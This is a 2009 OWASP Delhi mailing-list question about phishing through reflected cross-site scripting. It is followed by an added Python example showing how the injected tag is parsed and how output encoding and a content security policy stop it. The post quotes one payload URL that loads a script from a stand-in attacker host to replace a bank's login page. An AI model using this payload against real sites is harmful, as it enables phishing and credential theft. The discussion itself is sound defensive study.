[Owasp-delhi] Phishing with XSS

Parmendra Sharma s.parmendra at gmail.com
Wed Feb 25 06:26:56 EST 2009


Hello OWASP Members,

I have a doubt and here it is...

In performing Phishing with XSS a script like "do.js"


"http://www.attacked-bank.com/module.asp?search=<Script
src=http://attacker-IP-address/do.js/>"

can be used to change the original login page to the attacker's choice
without actually changing the URL.

Now my question is that for performing the above-said case this script needs
to be executed by the browser without the user's consent. In a general
scenario, while requesting a script like this, first a pop-up is given by
the browser asking whether to run or to save the script.

Please suggest.



-- 
Thanks and Regards:

Parmendra Sharma
Indian Computer Emergency Response Team (CERT-In)
Ministry of Information Technology
Government of India
6 C.G.O Complex
Lodhi Road
New Delhi
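
Added example, not part of the original message: a reflected parameter becomes page markup, so an HTML parser treats the injected tag as an ordinary script element of the page rather than a file download, and HTML-encoding the value on output removes it. `TEMPLATE`, the function names and the CSP value are assumptions for illustration; the payload is the one quoted in the message.

```python
import html
from html.parser import HTMLParser

# Payload taken from the URL quoted in the message above.
PAYLOAD = "<Script src=http://attacker-IP-address/do.js/>"

# Hypothetical template standing in for the results page of module.asp.
TEMPLATE = "<html><body><p>Results for: {term}</p><form>login</form></body></html>"

# Defence in depth (assumed policy): only same-origin scripts may load,
# even if output encoding is missed somewhere.
CSP_HEADER = ("Content-Security-Policy", "script-src 'self'")


def render_unsafe(search: str) -> str:
    """Reflects the parameter verbatim, as the vulnerable page does."""
    return TEMPLATE.format(term=search)


def render_safe(search: str) -> str:
    """HTML-encodes the parameter so it is shown as text, never parsed as markup."""
    return TEMPLATE.format(term=html.escape(search, quote=True))


class _ScriptFinder(HTMLParser):
    """Collects the src of every script element found in the markup."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # the parser lowercases tag names
            self.srcs.append(dict(attrs).get("src") or "(inline)")


def script_sources(page: str) -> list:
    """Lists the script elements an HTML parser sees in the page."""
    finder = _ScriptFinder()
    finder.feed(page)
    finder.close()
    return finder.srcs


if __name__ == "__main__":
    print("unsafe:", script_sources(render_unsafe(PAYLOAD)))
    print("safe:  ", script_sources(render_safe(PAYLOAD)))
```
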